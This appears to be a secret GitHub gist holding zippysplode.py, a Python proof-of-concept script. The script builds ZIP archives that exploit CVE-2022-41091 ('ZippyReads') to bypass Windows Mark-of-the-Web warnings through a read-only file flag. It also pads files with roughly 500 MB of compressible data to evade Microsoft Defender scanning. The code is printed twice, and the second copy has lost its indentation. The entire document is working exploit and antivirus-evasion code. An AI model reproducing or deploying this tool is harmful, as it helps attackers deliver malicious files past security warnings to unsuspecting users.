rxwx/zippysplode.py Secret

## zippysplode.py
from zipfile import ZipFile, ZIP_DEFLATED
import argparse
import tempfile
import os
import shutil


def explode_file(filename):
    with open(filename, 'ab') as tmp:
        tmp.write(os.urandom(1) * 524288000)
    return filename

def build_zip(filename, outfile, readonly=False, explode=False):
    with tempfile.TemporaryDirectory() as tmpdir:
        filename = shutil.copyfile(filename, os.path.join(
                tmpdir, os.path.basename(filename)))
        if explode:
            print ('Exploding file')
            explode_file(filename)

        with ZipFile(outfile, 'w', ZIP_DEFLATED) as zf:
            zf.write(filename)
            for zinfo in zf.infolist():
                zinfo.filename = os.path.basename(zinfo.filename)
                if readonly and not zinfo.is_dir():
                    print ('Adding readonly flag')
                    zinfo.create_system = 1
                    zinfo.external_attr = 33
    print (f"Wrote zip file: {outfile}")

def add_motw(filename):
    with open(filename + ':Zone.Identifier:$DATA', 'w') as f:
        f.write('[ZoneTransfer]\nZoneId=3')
    print ("Added MOTW for testing")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="ZippyReads & DefenderExplode PoC")
    parser.add_argument("input_file", help="File to ZIP")
    parser.add_argument("output_file", help="Output ZIP file")
    parser.add_argument("-r", "--readonly",
        help="Exploit ZippyReads (CVE-2022-41091). Adds readonly flag",
        action="store_true", default=False
        )
    parser.add_argument("-e", "--explode",
        help="Exploit DefenderExplode." \
        "Pads the file with highly-compressable content to bypass Defender",
        action="store_true", default=False)

    args = parser.parse_args()
    build_zip(args.input_file, args.output_file, args.readonly, args.explode)
    add_motw(args.output_file)
	from zipfile import ZipFile, ZIP_DEFLATED
	import argparse
	import tempfile
	import os
	import shutil


	def explode_file(filename):
	with open(filename, 'ab') as tmp:
	tmp.write(os.urandom(1) * 524288000)
	return filename

	def build_zip(filename, outfile, readonly=False, explode=False):
	with tempfile.TemporaryDirectory() as tmpdir:
	filename = shutil.copyfile(filename, os.path.join(
	tmpdir, os.path.basename(filename)))
	if explode:
	print ('Exploding file')
	explode_file(filename)

	with ZipFile(outfile, 'w', ZIP_DEFLATED) as zf:
	zf.write(filename)
	for zinfo in zf.infolist():
	zinfo.filename = os.path.basename(zinfo.filename)
	if readonly and not zinfo.is_dir():
	print ('Adding readonly flag')
	zinfo.create_system = 1
	zinfo.external_attr = 33
	print (f"Wrote zip file: {outfile}")

	def add_motw(filename):
	with open(filename + ':Zone.Identifier:$DATA', 'w') as f:
	f.write('[ZoneTransfer]\nZoneId=3')
	print ("Added MOTW for testing")


	if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="ZippyReads & DefenderExplode PoC")
	parser.add_argument("input_file", help="File to ZIP")
	parser.add_argument("output_file", help="Output ZIP file")
	parser.add_argument("-r", "--readonly",
	help="Exploit ZippyReads (CVE-2022-41091). Adds readonly flag",
	action="store_true", default=False
	)
	parser.add_argument("-e", "--explode",
	help="Exploit DefenderExplode." \
	"Pads the file with highly-compressable content to bypass Defender",
	action="store_true", default=False)

	args = parser.parse_args()
	build_zip(args.input_file, args.output_file, args.readonly, args.explode)
	add_motw(args.output_file)